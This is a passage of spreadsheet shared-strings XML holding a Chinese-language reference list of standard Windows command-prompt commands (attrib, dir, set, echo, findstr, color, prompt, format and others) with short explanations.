        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> -A -R -S -H </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> +A +R +S +H </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>去掉</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>添加</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>某文件的存档，只读，系统，隐藏</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>属性；用＋则是添加为某属性</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">dir </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看文件，参数：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/Q</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示文件及目录属系统哪个用户，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/T:C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示文件创建时间，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/T:A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示文件上次被访问时间，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/T:W</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上次被修改时间</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">date /t </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> time /t </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>使用此参数即“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DATE/T</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”、“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TIME/T</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”将只显示当前日期和时间，而不必输入新日期和时间</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">set </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指定环境变量名称</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要指派给变量的字符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置环境变量</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">set </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示当前所有的环境变量</t>
    </r>
  </si>
  <si>
    <r>
      <t>set p(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或其它字符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">) </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示出当前以字符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>p(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或其它字符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开头的所有环境变量</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">pause </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>暂停批处理程序，并显示出：请按任意键继续</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>....</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">if </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在批处理程序中执行条件处理（更多说明见</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>if</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令及变量）</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">goto </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标签将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cmd.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>start</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”标签）</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">call </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>路径</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>批处理文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>从批处理程序中调用另一个批处理程序（更多说明见</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>call /?</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">for </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对一组文件中的每一个文件执行某个特定命令（更多说明见</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>for</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令及变量）</t>
    </r>
  </si>
  <si>
    <r>
      <t>echo on</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">off </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打开或关闭</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>echo</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，仅用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>echo</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不加参数则显示当前</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>echo</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">echo </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信息</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在屏幕上显示出信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">echo </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信息</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> &gt;&gt; pass.txt </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>"</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信息</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>"</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保存到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>pass.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件中</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">findstr "Hello" aa.txt </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>aa.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件中寻找字符串</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>hello</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">find </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查找某文件</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">title </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标题名字</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>更改</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>窗口标题名字</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">color </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颜色值设置</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制台前景和背景颜色；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＝黑、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＝蓝、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＝绿、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＝浅绿、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＝红、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＝紫、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＝黄、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>7=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>8=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灰、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>9=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡蓝、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＝淡绿、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡浅绿、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡红、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>D=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡紫、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>E=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡黄、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>F=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>亮白</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">prompt </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名称更改</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cmd.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的显示的命令提示符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C:\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>D:\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>统一改为：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>EntSky\ )</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">print </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打印文本文件</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ver </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>窗口下显示版本信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">format </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> /FS:</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>类型</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格式化磁盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>类型</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>:FAT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FAT32</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
